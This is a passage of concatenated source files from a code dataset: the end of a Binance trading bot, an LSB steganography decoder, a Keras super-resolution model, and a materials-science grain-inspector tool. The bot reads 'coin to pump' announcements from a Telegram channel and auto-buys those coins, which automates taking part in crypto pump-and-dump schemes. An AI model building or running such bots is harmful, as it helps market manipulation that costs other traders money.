return final_price\n\n def set_take_profit(self):\n # PERCENT_PRICE Filter Check\n if(self.takeProfitAt>=399):\n print(colored('WARNING : Your Take Profit value is too high, Binance allows only 400% TP to be set','yellow'))\n self.takeProfitAt=398\n if(self.takeProfitLimit>=399):\n print(colored('WARNING : Your Take Profit Limit value is too high, Binance allows only 400% TP to be set','yellow'))\n self.takeProfitLimit=398\n take_profit_price = self.calculate_target_price(\n self.price_brought, self.takeProfitLimit, False\n )\n stop_price = self.calculate_target_price(\n self.price_brought, self.takeProfitAt, False\n )\n price_formatted = self.float_precision(take_profit_price, self.tick_size)\n stop_price_formatted = self.float_precision(stop_price, self.tick_size)\n try:\n order_take_ptf = self.client.create_order(\n symbol=self.coin_symbol,\n side=SIDE_SELL,\n type=ORDER_TYPE_TAKE_PROFIT_LIMIT,\n quantity=self.quantity_brought,\n price=price_formatted,\n stopPrice=stop_price_formatted,\n timeInForce=TIME_IN_FORCE_GTC,\n )\n return order_take_ptf\n except BinanceAPIException as e:\n print(colored(f\"Take Profit Error - {e}\", \"red\"))\n\n def set_stop_loss(self):\n # PERCENT_PRICE Filter Check\n if(self.stopLossAt>=80):\n print(colored('WARNING : Your Stop Loss value is too high, Binance allows only 80% stopLoss to be set','yellow'))\n self.stopLossAt=79\n if(self.stopLossLimit>=80):\n print(colored('WARNING : Your Stop Loss Limit value is too high, Binance allows only 80% stopLoss to be set','yellow'))\n self.stopLossLimit=79\n stop_loss_price = self.calculate_target_price(\n self.price_brought, self.stopLossLimit, True\n )\n stop_price = self.calculate_target_price(\n self.price_brought, self.stopLossAt, True\n )\n price_formatted = self.float_precision(stop_loss_price, self.tick_size)\n stop_price_formatted = self.float_precision(stop_price, self.tick_size)\n try:\n order_stop_loss = self.client.create_order(\n symbol=self.coin_symbol,\n side=SIDE_SELL,\n type=ORDER_TYPE_STOP_LOSS_LIMIT,\n quantity=self.quantity_brought,\n price=price_formatted,\n stopPrice=stop_price_formatted,\n timeInForce=TIME_IN_FORCE_GTC,\n )\n return order_stop_loss\n except BinanceAPIException as e:\n print(colored(f\"Stop Loss Error - {e}\", \"red\"))\n\n def set_oco_order(self):\n take_profit_price = self.float_precision(\n self.calculate_target_price(\n self.price_brought, self.takeProfitLimit, False\n ),\n self.tick_size,\n )\n stop_loss_price = self.float_precision(\n self.calculate_target_price(self.price_brought, self.stopLossLimit, True),\n self.tick_size,\n )\n stop_price = self.float_precision(\n self.calculate_target_price(self.price_brought, self.stopLossAt, True),\n self.tick_size,\n )\n try:\n oco_order = self.client.create_oco_order(\n symbol=self.coin_symbol,\n side=SIDE_SELL,\n stopLimitTimeInForce=TIME_IN_FORCE_GTC,\n quantity=self.quantity_brought,\n stopPrice=stop_price,\n stopLimitPrice=stop_loss_price,\n price=take_profit_price,\n )\n return oco_order\n except BinanceAPIException as e:\n print(colored(f\"OCO order Error - {e}\", \"red\"))\n\n def openCurrencyChart(self):\n curreny_url_binance = (\n f\"https://www.binance.com/en/trade/{self.coin_currency}_BTC?layout=basic\"\n )\n webbrowser.open(curreny_url_binance)\n\n def start(self):\n self.coin_currency = self.coin_symbol[0 : len(self.coin_symbol) - 3]\n self.get_asset_info()\n market_order = self.create_market_order()\n price_brought_list, commission = [], 0\n if market_order:\n for i in market_order[\"fills\"]:\n 
price_brought_list.append(float(i[\"price\"]))\n if i[\"commissionAsset\"] == self.coin_currency:\n commission += float(i[\"commission\"])\n self.quantity_brought = float(\n self.float_precision(\n float(market_order[\"executedQty\"]) - commission, self.step_size\n )\n )\n self.price_brought = self.Average(price_brought_list)\n\n print(\n f\"Market Buy Successful at price {colored(self.price_brought,'green')} and quantity brought - {colored(self.quantity_brought,'green')}\"\n )\n if self.take_profit == \"true\" and self.stopLoss != \"true\":\n take_profit_order = self.set_take_profit()\n if take_profit_order:\n print(colored(f\"Take Profit Successfully set!\", \"green\"))\n self.tp_order_id = take_profit_order[\"orderId\"]\n if self.stopLoss == \"true\" and self.take_profit != \"true\":\n stop_loss_order = self.set_stop_loss()\n if stop_loss_order:\n print(colored(f\"Stop Loss Successfully set!\", \"green\"))\n self.sl_order_id = stop_loss_order[\"orderId\"]\n if self.take_profit == \"true\" and self.stopLoss == \"true\":\n self.oco_order = self.set_oco_order()\n if self.oco_order:\n print(\n colored(f\"Take Profit and Stop Loss Successfully Set!\", \"green\")\n )\n self.openCurrencyChart()\n if self.timeout > 0:\n t = self.timeout\n while t:\n mins, secs = divmod(t, 60)\n timer = \"{:02d}:{:02d}\".format(mins, secs)\n print(colored(timer, \"yellow\"), end=\"\\r\")\n time.sleep(1)\n t -= 1\n if self.tp_order_id:\n try:\n order_status_tp = self.client.get_order(\n symbol=self.coin_symbol, orderId=self.tp_order_id\n )\n if order_status_tp[\"status\"] == \"FILLED\":\n self.tp_triggered = True\n except BinanceAPIException as e:\n print(colored(f\"Failed to get TP Order - {e}\", \"red\"))\n elif self.sl_order_id:\n try:\n order_status_sl = self.client.get_order(\n symbol=self.coin_symbol, orderId=self.sl_order_id\n )\n if order_status_sl[\"status\"] == \"FILLED\":\n self.sl_triggered = True\n except BinanceAPIException as e:\n print(colored(f\"Failed to get SL Order - {e}\", \"red\"))\n elif self.oco_order:\n try:\n order_status_oco = self.client.get_order(\n symbol=self.coin_symbol,\n orderId=self.oco_order[\"orders\"][1][\"orderId\"],\n )\n if order_status_oco[\"status\"] == \"FILLED\":\n self.tp_triggered = True\n elif order_status_oco[\"status\"] == \"EXPIRED\":\n self.sl_triggered = True\n except BinanceAPIException as e:\n print(colored(f\"Failed to get OCO Order - {e}\", \"red\"))\n if not self.tp_triggered and not self.sl_triggered:\n if self.tp_order_id:\n try:\n self.client.cancel_order(\n symbol=self.coin_symbol, orderId=self.tp_order_id\n )\n except BinanceAPIException as e:\n print(colored(f\"Failed to Cancel TP order - {e}\", \"red\"))\n if self.sl_order_id:\n try:\n self.client.cancel_order(\n symbol=self.coin_symbol, orderId=self.sl_order_id\n )\n except BinanceAPIException as e:\n print(colored(f\"Failed to Cancel SL order - {e}\", \"red\"))\n if self.oco_order:\n try:\n self.client.cancel_order(\n symbol=self.coin_symbol, orderId=self.oco_order[\"orders\"][1][\"orderId\"]\n )\n except BinanceAPIException as e:\n print(colored(f\"Failed to Cancel OCO order - {e}\", \"red\"))\n print(\n colored(\n \"None of Take Profit or Stop Loss were triggered, Selling ASAP !\",\n \"yellow\",\n )\n )\n\n market_sell_order = self.create_market_order_sell()\n if market_sell_order and market_sell_order[\"status\"] == \"FILLED\":\n print(colored(\"Market Sell Successful !\", \"green\"))\n if market_sell_order and market_sell_order[\"status\"] != \"FILLED\":\n print(\n colored(\n \"Market Sell 
Partially Successful or Failed, Please check on Binance.com\",\n \"yellow\",\n )\n )\n else:\n if self.tp_triggered:\n print(\n colored(\n \"Congrats, Your Take Profit Order was triggered!\",\n \"green\",\n )\n )\n if self.sl_triggered:\n print(colored(\"Your Stop Loss Order was triggered!\", \"green\"))\n\n\n def initialise(self):\n if self.useTelegramCapture == \"true\":\n\n @self.telegram_client.on(events.NewMessage)\n async def my_event_handler(event):\n if event.chat_id == self.channel_id:\n self.coin_symbol = (extract(event.raw_text) + \"BTC\").upper()\n if re.match(\"^[A-Z0-9-_.]{1,20}$\", self.coin_symbol):\n print(\n f\"Coin to pump detected - {colored(self.coin_symbol,'green')}\"\n )\n self.coin_extract_status = True\n\n await self.telegram_client.disconnect()\n\n self.telegram_client.start()\n print(\"Listening for messages (press Ctrl+c to exit)!\")\n self.telegram_client.run_until_disconnected()\n if not self.coin_extract_status:\n print(colored(\"Failed to detect coin, enter manually!\", \"yellow\"))\n self.coin_symbol = (input() + \"BTC\").upper()\n if self.coin_symbol != \"\":\n self.start()\n else:\n print(\"Enter Coin name\")\n self.coin_symbol = input().upper() + \"BTC\"\n print(f\"Coin Entered - {colored(self.coin_symbol,'green')}\")\n self.start()\n\n\ndef main(data, isTrial):\n client = Bot(data, isTrial)\n client.initialise()\n","sub_path":"client/scripts/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":15846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"72453942","text":"import cv2 as cv\n\nheight = 0\nwidth = 0\n\ndef last(x):\n\t\"\"\"Return an integer value, the least significant bit of the argument.\"\"\"\n\tx = bin(x)\n\treturn x[len(x)-1]\n\ndef get_ascii(arr_list):\n\t\"\"\"Return a character, ascii equivalent of a number\"\"\"\n\tdeci = 0\n\tfor i in range(len(arr_list)):\n\t\tif arr_list[i] == '1':\n\t\t\tdeci = deci + pow(2,len(arr_list)-i)\n\n\treturn str(deci)\n\t\t\ndef getnext(list1,pos):\n\t\"\"\"Returns next character in message\"\"\"\n\tsum = 0\n\tk = 7\n\tfor i in range(pos,pos+8):\n\t\tif list1[i]=='1':\n\t\t\tsum = sum+pow(2,k)\n\t\tk = k-1\n\n\treturn chr(sum)\n\ndef get_message_size():\n\t\"\"\"Determines the size of message\"\"\"\n\tfile_obj = open(\"Res/user_input.txt\",\"r\")\n\tstring = file_obj.readline()\n\treturn len(string)\n\ndef write_To_File(message):\n\t\"\"\"Writes the decoded message to a file named Decoded.txt\"\"\"\n\tfile_obj = open(\"Res/decoded.txt\",\"w\")\n\tfile_obj.write(message)\n\n\ndef decode():\n\t\"\"\"main decoding logic\"\"\"\n\t\n\t''' Reading the steganographed Imgae file and calculating height and width of the image'''\n\tsteganoImage = cv.imread(\"Res/steganographed_image.png\",1)\n\theight,width = steganoImage.shape[:2]\n\n\t''' Initializes the message as null'''\n\tmessage = \"\"\n\n\t''' Initializes the starting conditions'''\n\tcolumn=0\n\trow=0\n\tcolor=0\n\n\t''' Last bits is an array that holds last bits of pixel values.'''\n\tlast_bits = []\n\n\tfor row in range(height):\n\t\tfor column in range(width):\n\t\t\tlast_bits.append(last(steganoImage[row][column][color]))\n\t\t\tif (column+1)%width == 0:\n\t\t\t\trow = row+1\n\t\t\t\tif row == height:\n\t\t\t\t\trow = 0\n\t\t\t\t\tcolor = color+1\n\t\t\tcolumn = (column+1)%width\n\n\tmessage_size = get_message_size()\n\n\ti=0\n\twhile True:\n\t\tnextChar = getnext(last_bits,i)\n\t\tif(nextChar == '`'):\n\t\t\ttemp = getnext(last_bits,i)\n\t\t\ti = i+8\n\t\t\ttemp2 = getnext(last_bits,i)\n\t\t\tif(temp == '`'):\n\t\t\t\tif(temp2 == '`'):\n\t\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tmessage+=temp\n\t\t\t\tmessage+=temp2\n\t\tmessage+=nextChar\n\t\ti = i+8\n\t\t\n\twrite_To_File(message)\n\ndef main():\n\tdecode()\n\t\nif __name__ == '__main__':\n\tmain()","sub_path":"LSB_Linear_Ret.py","file_name":"LSB_Linear_Ret.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"322692822","text":"import logging\nimport os\nfrom abc import ABC, abstractmethod\nfrom typing import Dict, Tuple\n\nimport numpy as np\nfrom keras import Model\nfrom keras import backend as keras_backend\nfrom keras import layers\nfrom keras import losses\nfrom keras import optimizers\n\nfrom modules.generators import generators\nfrom modules.image import image, image_batch, image_utils\nfrom modules.model import denseblock, callbacks, model_utils\n\nDEFAULTS = {\n 'lr': 0.001,\n 'input_shape': [256, 256, 3],\n 'batch_size': 16,\n 'image_op': 'derez',\n 'training_directory': os.path.join('data', 'training'),\n 'validation_directory': os.path.join('data', 'validation'),\n 'evaluation_directory': os.path.join('data', 'evaluation'),\n 'steps': 1000,\n}\n\nMODULE_VERSION = '0'\n\nSUPPORTED_IMAGE_OPS_VERSION_TABLE = {\n 'blur': '0',\n 'derez': '1',\n 'blur_derez': '2',\n}\n\nLOG = logging.getLogger(__name__)\n\n\ndef psnr_loss(y_true, y_pred):\n \"\"\" PSNR is Peak Signal to Noise Ratio, defined below\n PSNR = 20 * log10(MAXp) - 10 * log10(MSE)\n MAXp = maximum pixel value.\n Our framework scales to [0,1] range, so MAXp = 1.\n The 20 * log10(MAXp) reduces to 0\n\n https://en.wikipedia.org/wiki/Peak_signal-to-noise_ratio\n \"\"\"\n\n return -10.0 * keras_backend.log(\n losses.mean_squared_error(y_true, y_pred)\n ) / keras_backend.log(10.0)\n\n\nclass SRModel(ABC):\n\n def __init__(self, config: Dict, model_version: str='0'):\n self._config = self._add_defaults(\n config=config,\n model_version=model_version\n )\n\n constructed_model = self._create_model(config=self._config)\n\n self._model = self._load_or_save_model_weights(\n model=constructed_model,\n config=self._config\n )\n\n model_utils.save_config(self._config)\n # only initialized before training\n self._image_generator = None\n\n def _add_defaults(self, config: Dict, model_version: str) -> Dict:\n \"\"\"Adds essential default values to a config dictionary via Default\n \"\"\"\n for key in DEFAULTS.keys():\n config[key] = config.get(key, DEFAULTS[key])\n\n config['name'] = config.get('name', self.__class__.__name__)\n\n image_op_version = SUPPORTED_IMAGE_OPS_VERSION_TABLE[config['image_op']]\n\n config['version'] = \\\n f'v{MODULE_VERSION}.{model_version}.{image_op_version}'\n\n # handles JSON not allowing tuples\n config['input_shape'] = tuple(config['input_shape'])\n\n # Handles the fpaths is any are missing\n path_keys = {\n 'model_fpath': 'model.hdf5',\n 'config_fpath': 'config.json',\n 'log_fpath': 'log.csv',\n }\n # Maps the file extensions for each key, so the path can be constructed easily\n for path_key in path_keys.keys():\n if config.get(path_key) is None:\n config[path_key] = os.path.join(\n self._save_name(config['version']),\n path_keys[path_key]\n )\n\n return config\n\n @property\n def version(self):\n return self._config['version']\n\n @staticmethod\n def _save_name(version: str) -> str:\n \"\"\"Name for saving and reading stored weights\n\n :param version: Version of model\n :return: An initialized directory path\n \"\"\"\n dir_path = os.path.join('configs', version)\n if not os.path.isdir(dir_path):\n os.mkdir(dir_path)\n return dir_path\n\n @staticmethod\n def _load_or_save_model_weights(model: Model, config: Dict) -> Model:\n \"\"\"Loads model weight if they exist, else saves them to model_fpath\n\n :param model: Constructed Model architecture\n :param config: configuration file\n :return: Model with loaded weight (if any)\n \"\"\"\n if os.path.isfile(config['model_fpath']):\n 
model.load_weights(config['model_fpath'])\n LOG.info(\n 'Loaded model weights from {}'.format(\n config['model_fpath'])\n )\n else:\n model.save_weights(config['model_fpath'])\n LOG.info(\n 'Initialized new model weights to {}'.format(\n config['model_fpath'])\n )\n return model\n\n @staticmethod\n def _initialize_image_generator_with_data(\n config: Dict) -> generators.SRImageGenerator:\n \"\"\"Initializes an SRImageGenerator from a configuration\n\n :param config: configuration dictionary\n :return: SRImageGenerator with data specified by configuration data paths\n \"\"\"\n return generators.SRImageGenerator(\n training_data=image_batch.PILImageBatch.open_from_list(\n image_utils.get_image_paths_from_dir(\n dir_path=config['training_directory'],\n image_file_extension='.png'\n )\n ),\n validation_data=image_batch.PILImageBatch.open_from_list(\n image_utils.get_image_paths_from_dir(\n dir_path=config['validation_directory'],\n image_file_extension='.png'\n )\n ),\n config=config\n )\n\n @abstractmethod\n def _create_model(self, config: Dict) -> Model:\n \"\"\"Creates the model\n\n :param config: Configuration file\n :return: ImageSR model\n \"\"\"\n pass\n\n def train(self, epochs: int):\n \"\"\"Trains the model for a given number of epochs.\n\n :param epochs: Number of epochs to train the model\n \"\"\"\n # initialize the image generator if not already initialized\n if self._image_generator is None:\n self._image_generator = \\\n self._initialize_image_generator_with_data(\n config=self._config\n )\n\n initial_epoch = self._config.get('epoch', 0)\n LOG.info(\n f'Training model for {epochs} epochs, starting at {initial_epoch}'\n )\n\n self._model.compile(\n optimizer=optimizers.Adam(\n lr=self._config['lr']\n ),\n loss='mse',\n metrics=[psnr_loss]\n )\n\n model_callbacks = callbacks.callback_list(self._config)\n steps = self._config['steps']\n\n self._model.fit_generator(\n self._image_generator.training_generator(),\n steps_per_epoch=steps,\n epochs=epochs+initial_epoch,\n verbose=LOG.getEffectiveLevel() <= logging.INFO,\n callbacks=model_callbacks,\n validation_data=self._image_generator.validation_generator(),\n validation_steps=steps // 10,\n initial_epoch=initial_epoch)\n\n def enhance(self,\n img: image.PILImage,\n output_size: Tuple[int, int]) -> image.PILImage:\n \"\"\"Performs the enhancement algorithm on a given image\n\n The basic algorithm is to increase the size of the image by a factor\n of at most 2 until it reaches the correct size\n\n :param img: Original PIL image\n :param output_size: desired output shape\n :return: Enhanced PILImage at the new output_size\n \"\"\"\n output_img = img\n while output_img.size != output_size:\n new_size: Tuple[int, int] = (\n min(2*output_img.size[0], output_size[0]),\n min(2*output_img.size[1], output_size[1]),\n )\n output_img_at_new_size = output_img.resize(size=new_size)\n\n # apply a blur if a blur was used in training\n if 'blur' in self._config['image_op']:\n output_img_at_new_size = output_img_at_new_size.blur()\n\n # numpyize the image for the model\n np_image = output_img_at_new_size.numpyize()\n\n # image needs to be a rank 4 input (1,) + image_shape\n model_input = np.expand_dims(np_image, axis=0)\n\n # use the model to predict the residual image\n residual_image = self._model.predict(model_input, batch_size=1)[0]\n\n # add the residual to the original\n enhanced_np_image = np_image + residual_image\n\n # clip the values to the expected [0, 1] range\n enhanced_np_image = enhanced_np_image.clip(min=0.0, max=1.0)\n\n # set back 
to PIL image\n output_img = image.PILImage.from_numpy_array(enhanced_np_image)\n\n return output_img\n","sub_path":"modules/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"429224458","text":"# Copyright 2020 Mechanics of Microstructures Group\n# at The University of Manchester\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport numpy as np\n\nfrom sklearn.cluster import MeanShift\nfrom scipy.stats import linregress\nimport pandas as pd\n\nfrom defdap.plotting import Plot, GrainPlot, LineSlice\n\n\nclass GrainInspector:\n \"\"\"\n Class containing the interactive grain inspector tool for slip trace analysis\n and relative displacement ratio analysis.\n\n \"\"\"\n def __init__(self, currMap, vmax=0.1):\n # Initialise some values\n self.grainID = 0\n self.currMap = currMap\n self.currEBSDMap = self.currMap.ebsdMap\n self.currDICGrain = self.currMap[self.grainID]\n self.currEBSDGrain = self.currDICGrain.ebsdGrain\n self.vmax = vmax\n \n # Draw the figure\n self.draw()\n\n def draw(self):\n \"\"\" Draw the main window, buttons, text boxes and axes.\n\n \"\"\"\n # Plot window\n self.plot = Plot(ax=None, makeInteractive=True, figsize=(14,8), title='Grain Inspector')\n \n # Buttons\n self.plot.addButton('Save\\nLine', self.saveLine, (0.73, 0.48, 0.05, 0.04))\n self.plot.addButton('Previous\\nGrain', lambda e, p: self.gotoGrain(self.grainID-1, p), (0.73, 0.94, 0.05, 0.04))\n self.plot.addButton('Next\\nGrain', lambda e, p: self.gotoGrain(self.grainID+1, p), (0.79, 0.94, 0.05, 0.04))\n self.plot.addButton('Run\\nAll STA', self.batchRunSTA, (0.81, 0.02, 0.1, 0.04))\n self.plot.addButton('Clear\\nAll Lines', self.clearAllLines, (0.89, 0.48, 0.05, 0.04))\n\n # Text boxes\n self.plot.addTextBox(label='Go to \\ngrain ID:', loc=(0.9, 0.94, 0.05, 0.04), submitHandler=self.gotoGrain)\n self.plot.addTextBox(label='Remove\\nID:', loc=(0.83, 0.48, 0.05, 0.04), submitHandler=self.removeLine)\n self.RDRGroupBox = self.plot.addTextBox(label='Run RDR\\non group:',\n loc=(0.78, 0.07, 0.05, 0.04), submitHandler=self.runRDRGroup)\n\n # Axes\n self.maxShearAx = self.plot.addAxes((0.05, 0.4, 0.65, 0.55))\n self.slipTraceAx = self.plot.addAxes((0.2, 0.05, 0.6, 0.3))\n self.unitCellAx = self.plot.addAxes((0.05, 0.055, 0.15, 0.3), proj='3d')\n self.grainInfoAx = self.plot.addAxes((0.73, 0.86, 0.25, 0.06))\n self.lineInfoAx = self.plot.addAxes((0.73, 0.55, 0.25, 0.3))\n self.groupsInfoAx = self.plot.addAxes((0.73, 0.15, 0.25, 0.3))\n self.grainPlot = self.currMap[self.grainID].plotMaxShear(fig=self.plot.fig, ax=self.maxShearAx, \n vmax=self.vmax, plotScaleBar=True, plotColourBar=True)\n self.plot.ax.axis('off')\n \n # Draw the stuff that will need to be redrawn often in a seperate function\n self.redraw()\n\n def gotoGrain(self, event, plot):\n \"\"\" Go to a specified grain ID.\n\n Parameters\n ----------\n event: int\n Grain ID to go to.\n\n \"\"\"\n ## Go to grain ID specified in event\n self.grainID=int(event)\n self.grainPlot.arrow=None\n self.currDICGrain = self.currMap[self.grainID]\n self.currEBSDGrain = self.currDICGrain.ebsdGrain\n self.redraw()\n\n def saveLine(self, event, plot):\n \"\"\" Save the start point, end point and angle of drawn line into the 
grain.\n\n Parameters\n ----------\n event: numpy.ndarray\n Start x, start y, end x, end y point of line passed from drawn line.\n\n \"\"\"\n # Get angle of lines\n lineAngle = 90-np.rad2deg(np.arctan2(self.drawnLine.points[3]-self.drawnLine.points[1], \n self.drawnLine.points[2]-self.drawnLine.points[0]))\n if lineAngle > 180: lineAngle -= 180\n elif lineAngle < 0: lineAngle += 180\n #lineAngle += self.currMap.ebsdTransform.rotation*-180/np.pi\n \n # Save drawn line to the DIC grain\n self.currDICGrain.pointsList.append([self.drawnLine.points, lineAngle, -1])\n \n # Group lines and redraw\n self.groupLines()\n self.redraw()\n \n def groupLines(self):\n \"\"\"\n Group the lines drawn in the current grain item using a mean shift algorithm,\n save the average angle and detect the active slip planes.\n\n \"\"\"\n angles = [x[1] for x in self.currDICGrain.pointsList]\n # For single line, don't group\n if len(angles) == 1:\n self.currDICGrain.pointsList[0][2]=0\n self.currDICGrain.groupsList = [[0, angles[0], 0, 0, 0]]\n else:\n # Run clustering algorithm for >1 line\n ms = MeanShift(bandwidth=10).fit(np.matrix([range(len(angles)), angles]).transpose())\n \n # Add group ID for each line to the points list\n for i, label in enumerate(ms.labels_):\n self.currDICGrain.pointsList[i][2] = label\n \n # Make array of groups with mean angle\n self.currDICGrain.groupsList = []\n for i in range(np.max(ms.labels_+1)):\n self.currDICGrain.groupsList.append([i, ms.cluster_centers_[i][1], 0, 0, 0])\n \n # Detect active slip systems in each group\n for group in self.currDICGrain.groupsList:\n activePlanes = []\n deviation = []\n experimentalAngle = group[1]\n for idx, theoreticalAngle in enumerate(np.rad2deg(self.currEBSDGrain.slipTraceAngles)):\n if theoreticalAngle-5 < experimentalAngle < theoreticalAngle+5:\n activePlanes.append(idx)\n deviation.append(experimentalAngle-theoreticalAngle)\n group[2] = activePlanes\n group[3] = deviation\n \n def clearAllLines(self, event, plot):\n \"\"\" Clear all lines in a given grain.\n\n \"\"\"\n\n self.currDICGrain.pointsList = []\n self.currDICGrain.groupsList = []\n self.redraw()\n\n def removeLine(self, event, plot):\n \"\"\" Remove single line [runs after submitting a text box].\n\n Parameters\n ----------\n event: int\n Line ID to remove.\n\n \"\"\"\n ## Remove single line\n del self.currDICGrain.pointsList[int(event)]\n self.redraw()\n\n def redraw(self):\n \"\"\"\n Draw items which need to be redrawn often (i.e. 
when changing grain ID).\n\n \"\"\"\n\n # Plot max shear for grain\n self.maxShearAx.clear()\n grainPlot = self.currMap[self.grainID].plotMaxShear(\n fig=self.plot.fig,ax=self.maxShearAx, vmax=self.vmax, plotColourBar=False, plotScaleBar=True)\n\n # Draw slip traces\n self.slipTraceAx.clear()\n self.slipTraceAx.set_aspect('equal', 'box')\n slipPlot = GrainPlot(fig=self.plot.fig, callingGrain=self.currMap[self.grainID], ax=self.slipTraceAx)\n traces = slipPlot.addSlipTraces(topOnly=True)\n self.slipTraceAx.axis('off')\n \n # Draw slip bands\n bands = [elem[1] for elem in self.currDICGrain.groupsList]\n if self.currDICGrain.groupsList != None:\n slipPlot.addSlipBands(topOnly=True, angles=list(np.deg2rad(bands)))\n \n # Draw unit cell\n self.unitCellAx.clear()\n self.currEBSDGrain.plotUnitCell(fig=self.plot.fig, ax=self.unitCellAx)\n \n # Write grain info text\n self.grainInfoAx.clear()\n self.grainInfoAx.axis('off')\n grainInfoText = 'Grain ID: {0} / {1}\\n'.format(self.grainID, len(self.currMap.grainList))\n grainInfoText += 'Min: {0:.1f} % Mean:{1:.1f} % Max: {2:.1f} %'.format(\n np.min(self.currDICGrain.maxShearList)*100,\n np.mean(self.currDICGrain.maxShearList)*100,\n np.max(self.currDICGrain.maxShearList)*100)\n self.plot.addText(self.grainInfoAx, 0, 1, grainInfoText, va='top', ha='left', fontsize=10)\n \n # Detect lines\n self.drawnLine = LineSlice(ax=self.maxShearAx, fig=self.plot.fig, action=self.grainPlot.addArrow)\n\n # Write lines text and draw lines\n linesTxt = 'List of lines\\n\\nLineID x0 y0 x1 y1 Angle Group\\n'\n\n if self.currDICGrain.pointsList != []:\n for idx, points in enumerate(self.currDICGrain.pointsList):\n linesTxt += '{0} {1:.1f} {2:.1f} {3:.1f} {4:.1f} {5:.1f} {6}\\n'.format(idx,\n points[0][0], points[0][1], points[0][2], points[0][3], points[1], points[2])\n self.grainPlot.addArrow(startEnd=points[0], clearPrev=False, persistent=True, label=idx)\n \n self.lineInfoAx.clear()\n self.lineInfoAx.axis('off')\n self.plot.addText(self.lineInfoAx, 0, 1, linesTxt, va='top', fontsize=10)\n \n # Write groups info text\n groupsTxt = 'List of groups\\n\\nGroupID Angle System Dev RDR\\n'\n if self.currDICGrain.groupsList != []:\n for idx, group in enumerate(self.currDICGrain.groupsList):\n groupsTxt += '{0} {1:.1f} {2} {3} {4:.2f}\\n'.format(\n idx, group[1], group[2], np.round(group[3],3), group[4])\n\n self.groupsInfoAx.clear()\n self.groupsInfoAx.axis('off')\n self.plot.addText(self.groupsInfoAx, 0, 1, groupsTxt, va='top', fontsize=10)\n\n def runRDRGroup(self, event, plot):\n \"\"\" Run RDR on a specified group, upon submitting a text box.\n\n Parameters\n ----------\n event: int\n Group ID specified from text box.\n\n \"\"\"\n ## Run RDR for group of lines\n if event != '':\n self.calcRDR(grain = self.currDICGrain, group=int(event))\n self.RDRGroupBox.set_val('')\n \n def batchRunSTA(self, event, plot):\n \"\"\" Run slip trace analysis on all grains which have slip trace lines drawn.\n\n \"\"\"\n\n # Print header\n print(\"Grain\\tEul1\\tEul2\\tEul3\\tMaxSF\\tGroup\\tAngle\\tSystem\\tDev\\tRDR\")\n \n # Print information for each grain\n for idx, grain in enumerate(self.currMap):\n if grain.pointsList != []:\n for group in grain.groupsList:\n maxSF = np.max([item for sublist in grain.ebsdGrain.averageSchmidFactors for item in sublist])\n eulers = grain.ebsdGrain.refOri.eulerAngles()*180/np.pi # use each grain's own orientation\n text = '{0}\\t{1:.1f}\\t{2:.1f}\\t{3:.1f}\\t{4:.3f}\\t'.format(\n idx, eulers[0], eulers[1], eulers[2], maxSF)\n text += '{0}\\t{1:.1f}\\t{2}\\t{3}\\t{4:.2f}'.format(\n 
group[0], group[1], group[2], np.round(group[3],3), group[4])\n print(text)\n\n def calcRDR(self, grain, group, showPlot=True, length=2.5):\n \"\"\" Calculates the relative displacement ratio for a given grain and group.\n\n Parameters\n ----------\n grain: int\n DIC grain ID to run RDR on.\n group: int\n group ID to run RDR on.\n showPlot: bool\n if True, show plot window.\n length: int\n length of perpendicular lines used for RDR.\n\n \"\"\"\n \n ulist=[]; vlist=[]; allxlist = []; allylist = []; \n\n # Get all lines belonging to group\n points = []\n for point in grain.pointsList:\n if point[2] == group:\n points.append(point[0])\n\n for point in points:\n x0=point[0]; y0=point[1]; x1=point[2]; y1=point[3];\n grad = (y1-y0)/(x1-x0)\n invgrad = -1/grad\n profile_length = np.sqrt((y1-y0)**2+(x1-x0)**2)\n num = np.round(profile_length*2)\n \n ### Calculate positions for each point along slip trace line (x,y)\n x, y = np.round(np.linspace(x0, x1, int(num))), np.round(np.linspace(y0, y1, int(num)))\n df = pd.DataFrame({'x':x, 'y':y}).drop_duplicates()\n x,y = df['x'].values.tolist(),df['y'].values.tolist()\n\n ## Calculate deviation from (0,0) for points along line with angle perpendicular to slip line (xnew,ynew)\n x0new = np.sqrt(length/(invgrad**2+1))*np.sign(grad)\n y0new = -np.sqrt(length/(1/invgrad**2+1))\n x1new = -np.sqrt(length/(invgrad**2+1))*np.sign(grad)\n y1new = np.sqrt(length/(1/invgrad**2+1))\n profile_length=np.sqrt((y1new-y0new)**2+(x1new-x0new)**2)\n num = np.round(profile_length)\n xnew, ynew = np.linspace(x0new, x1new, int(num)), np.linspace(y0new, y1new, int(num))\n xnew, ynew = np.around(xnew).astype(int), np.around(ynew).astype(int)\n df = pd.DataFrame({'x':xnew, 'y':ynew}).drop_duplicates()\n xnew,ynew = df['x'].values.tolist(), df['y'].values.tolist()\n \n for x,y in zip(x,y):\n xperp = []; yperp = [];\n for xdiff, ydiff in zip(xnew, ynew):\n xperp.append(int(x+xdiff))\n yperp.append(int(y+ydiff))\n allxlist.append(xperp)\n allylist.append(yperp)\n\n xmap = self.currDICGrain.extremeCoords[0] + xperp\n ymap = self.currDICGrain.extremeCoords[1] + yperp\n \n ### For all points, append u and v to list\n u = []; v = [];\n for xmap, ymap in zip(xmap,ymap):\n u.append((self.currMap.crop(self.currMap.x_map))[ymap, xmap])\n v.append((self.currMap.crop(self.currMap.y_map))[ymap, xmap])\n\n ### Take away mean\n u = u-np.mean(u); v = v-np.mean(v)\n\n ### Append to main lists (ulist,vlist)\n ulist.extend(u)\n vlist.extend(v)\n\n ### Linear regression of ucentered against vcentered\n linRegResults = linregress(x=vlist,y=ulist)\n \n # Save measured RDR\n grain.groupsList[group][4] = linRegResults.slope\n \n\n if 